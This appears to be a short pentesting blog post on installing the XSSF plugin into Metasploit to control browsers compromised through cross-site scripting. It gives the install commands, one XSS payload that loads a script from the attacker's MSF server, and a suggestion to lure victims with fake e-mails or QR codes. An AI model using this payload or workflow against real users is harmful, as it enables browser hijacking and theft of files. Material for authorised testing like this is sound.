[Pentesting] Update - XSSF - Metasploit Framework (MSF)

This article is aimed to Pentester / IT Security Audit with "High technical Skill", is for this reason what I wrote it in english.

XSSF is an amazing framework developed for be used into Mestasploit Framework, what allow you manage victims of a generic XSS attack and hold an already existing connection in order to allow future attacks.

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes. [by XSSF at GoogleCode]

Quick Installation

After you install it into MSF (directory where you have MSF installed), you load XSSF like this:

Typical MSF folfer: /opt/metasploit/msf

$> wget http://dev.metasploit.com/redmine/attachments/596/XSSF.zip
$> unzip XSSF.zip

Copying all files (XSSF.zip) into his corresponding folder: data/ lib/ modules/ plugins/

$> msfconsole
$> load XSSF

New commands are available:
  • Simple Script/HTML execution (XSSF auxiliary modules) on targeted victim or group of victims
  • MSF Exploit execution on targeted victim
  • XSS Tunnel with targeted victim
Once you have loaded XSSF, you are in conditions to infect a victim with XSS attack, for example, you can used a fake e-mail, or using a QR Code, o whatever you want to gain your goal.

Example of XSS Attack:

<script src=”http://IP_Server-MSF:Listen-Port/loop?interval=5”></script>

UPDATE (04/10/2011)
I received an advice through twitter by user @X0x1RG9f, who gave me the correct URL of  XSSF Maintained Version.

Demonstration videos

Now, you can view amazing Videos showing how XSSF works:

1.XSSF Android file stealer

2. Launching MSF exploit through XSSF (CVE-2010-2568) 


Download can be done directly with the last packaged version in download section. Using the SVN repository is a better way of downloading and updating XSSF as the SVN trunk version is always up-to-date.

Last stable version: XSSF-2.1.tar
SHA1 Checksum: 6db5d579ad0a709b7671001a3e089b2a4c2b1fdb

Fuente: XSSF to Metasploit Framework | XSSF Google Code Project

For Spanish reader  I recommend the following article "Exploiting with XSSF" [Spanish language] or this other "XSSF+Metasploit+Ubuntu 11.04" [Spanish language]

0 comentarios:

Publicar un comentario